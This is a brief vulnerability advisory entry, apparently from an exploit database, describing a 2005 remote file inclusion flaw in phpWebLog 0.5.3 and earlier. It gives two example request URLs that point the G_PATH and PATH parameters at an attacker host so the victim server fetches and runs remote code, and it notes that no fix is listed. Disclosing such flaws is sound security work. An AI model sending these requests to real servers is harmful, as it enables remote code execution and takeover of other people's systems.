phpWebLog <= 0.5.3 Arbitrary File Inclusion

2005-03-07 00:00:00

Example:

if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.